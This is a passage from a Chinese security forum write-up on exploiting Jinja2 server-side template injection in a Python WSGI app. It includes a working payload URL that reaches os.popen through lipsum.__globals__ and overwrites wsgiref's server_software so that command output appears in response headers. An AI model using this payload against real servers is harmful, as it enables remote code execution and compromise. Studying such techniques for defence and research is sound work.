<span class=n>self</span><span class=o>.</span><span class=na>_write</span><span class=o>((</span><span class=err>'</span><span class=n>Status</span><span class=o>:</span> <span class=o>%</span><span class=n>s</span><span class=err>\</span><span class=n>r</span><span class=err>\</span><span class=n>n</span><span class=err>'</span> <span class=o>%</span> <span class=n>self</span><span class=o>.</span><span class=na>status</span><span class=o>).</span><span class=na>encode</span><span class=o>(</span><span class=err>'</span><span class=n>iso</span><span class=o>-</span><span class=mi>8859</span><span class=o>-</span><span class=mi>1</span><span class=err>'</span><span class=o>))</span>
|
|||
|
|
</pre></div>
|
|||
|
|
<p>看到 server_software</p>
|
|||
|
|
<p><a id=img12 href=https://xzfile.aliyuncs.com/media/upload/picture/20241208160313-dfc639c6-b53a-1.png><img src="data:image/png;base64,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
|
|||
|
|
<p>尝试修改一下呢</p>
|
|||
|
|
<pre><code>http://127.0.0.1:6543/?expression={{lipsum.__globals__.__builtins__.setattr(lipsum.__spec__.__init__.__globals__.sys.modules.wsgiref.simple_server.ServerHandler,"server_software",lipsum.__globals__.__builtins__.__import__('os').popen('echo%20success').read())}}</code></pre>
|
|||
|
|
<p><a id=img13 href=https://xzfile.aliyuncs.com/media/upload/picture/20241208160244-ce8caf8c-b53a-1.png title><img src="data:image/png;base64,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
|
|||
|
|
<p>可以发现也是成功了</p>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
<div class=post-user-action style=margin-top:34px>
|
|||
|
|
<span class="btn btn-default pull-right" id=mark data-action=topic data-pk=16631>
|
|||
|
|
<span id=mark-text>点击收藏 </span><span class=i-seprator> | </span><span id=mark-count>0</span>
|
|||
|
|
</span>
|
|||
|
|
|
|||
|
|
<span class="btn btn-default pull-right" id=follow_topic data-pk=16631>
|
|||
|
|
<span>关注</span><span class=i-seprator> | </span><span id=follow-count>1</span>
|
|||
|
|
</span>
|
|||
|
|
|
|||
|
|
|
|||
|
|
<span class="btn btn-default pull-right">
|
|||
|
|
<span>
|
|||
|
|
|
|||
|
|
<span id=ready_reward data-toggle=modal data-target=#myModal>打赏</span>
|
|||
|
|
|
|||
|
|
</span>
|
|||
|
|
</span>
|
|||
|
|
|
|||
|
|
<div class=clearfix></div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
<div class=related-section>
|
|||
|
|
<div class=related-box>
|
|||
|
|
|
|||
|
|
<span><a class=pull-left href=https://xz.aliyun.com/t/16630 title="代码审计 - MCMS v5.4.1 0day挖掘"><span class=related-label style="padding:3px 4px;margin-right:3px">上一篇:</span>代码审计 - MCMS v5.4....</a></span>
|
|||
|
|
|
|||
|
|
|
|||
|
|
<span><a class=pull-left href=https://xz.aliyun.com/t/16632 title=内存马生成工具JMG的哥斯拉插件:jmgg><span class=related-label>下一篇:</span>内存马生成工具JMG的哥斯拉插件:...</a></span>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
<div class="modal fade" id=myModal role=dialog aria-labelledby=myModalLabel aria-hidden=true>
|
|||
|
|
<div class=modal-dialog>
|
|||
|
|
<div class=modal-content>
|
|||
|
|
<div class=modal-header>
|
|||
|
|
<h4 class=modal-title id=myModalLabel style=text-align:center>
|
|||
|
|
积分打赏
|
|||
|
|
</h4>
|
|||
|
|
</div>
|
|||
|
|
<div class=modal-body id=button-value>
|
|||
|
|
<div style=text-align:center>
|
|||
|
|
<div role=group>
|
|||
|
|
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type1>
|
|||
|
|
1分
|
|||
|
|
</button>
|
|||
|
|
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type2>
|
|||
|
|
2分
|
|||
|
|
</button>
|
|||
|
|
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type3>
|
|||
|
|
5分
|
|||
|
|
</button>
|
|||
|
|
</div>
|
|||
|
|
<br>
|
|||
|
|
<div style=margin-top:20px>
|
|||
|
|
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type4>
|
|||
|
|
8分
|
|||
|
|
</button>
|
|||
|
|
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type5>
|
|||
|
|
10分
|
|||
|
|
</button>
|
|||
|
|
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type6>
|
|||
|
|
20分
|
|||
|
|
</button>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
<div class=modal-footer id=confirm>
|
|||
|
|
<button type=button class="btn btn-default" data-dismiss=modal>关闭</button>
|
|||
|
|
<button type=button class="btn btn-primary" id=reward_topic data-pk=16631>确定</button>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
<div class="row box">
|
|||
|
|
<ol class=breadcrumb>
|
|||
|
|
<li class=active>1 条回复</li>
|
|||
|
|
</ol>
|
|||
|
|
<div class="box-container post-container">
|
|||
|
|
|
|||
|
|
|
|||
|
|
<ul class=post-info id=reply-20708>
|
|||
|
|
<li>
|
|||
|
|
<div class="row1 user-info clearfix">
|
|||
|
|
|
|||
|
|
<img class="avatar pull-left tiny-avatar" src="data:image/png;base64,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
|
|||
|
|
|
|||
|
|
<span class=post-info>
|
|||
|
|
|
|||
|
|
<a class="label label-default" href=https://xz.aliyun.com/u/65563>1030868402993634</a>
|
|||
|
|
|
|||
|
|
<span class=bbs-time>2024-12-10 14:32:05</span>
|
|||
|
|
|
|||
|
|
<span>来自广东 </span>
|
|||
|
|
|
|||
|
|
</span>
|
|||
|
|
<div class="post-content markdown-body">
|
|||
|
|
<p>感谢分享</p>
|
|||
|
|
</div>
|
|||
|
|
<div class=manual-box>
|
|||
|
|
<span class=thumbs data-action=post data-pk=20708 data-topic=16631><i class="fa fa-thumbs-o-up"></i><span>0</span></span>
|
|||
|
|
<span class="reply-jump reply reply-count" data-nickname=1030868402993634>回复Ta</span>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
<hr>
|
|||
|
|
</li>
|
|||
|
|
</ul>
|
|||
|
|
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
<div class="row box" id=reply-box>
|
|||
|
|
|
|||
|
|
<div class="box-container clearfix">
|
|||
|
|
|
|||
|
|
<div class=reminder>
|
|||
|
|
<a href="https://account.aliyun.com/login/login.htm?oauth_callback=https%3A%2F%2Fxz.aliyun.com%2Ft%2F16631&from_type=xianzhi"><strong>登录</strong></a> 后跟帖
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
<footer class=bs-docs-footer>
|
|||
|
|
<div class="container text-center">
|
|||
|
|
<div class=links>
|
|||
|
|
<a href=https://xz.aliyun.com/feed target=_blank>RSS</a>
|
|||
|
|
<a href=https://xz.aliyun.com/about target=_blank><span>关于社区</span></a>
|
|||
|
|
<a href=https://xz.aliyun.com/partner target=_blank><span>友情链接</span></a>
|
|||
|
|
<a href=https://xz.aliyun.com/notice>社区小黑板</a>
|
|||
|
|
<a href=https://xz.aliyun.com/connection>联系我们</a>
|
|||
|
|
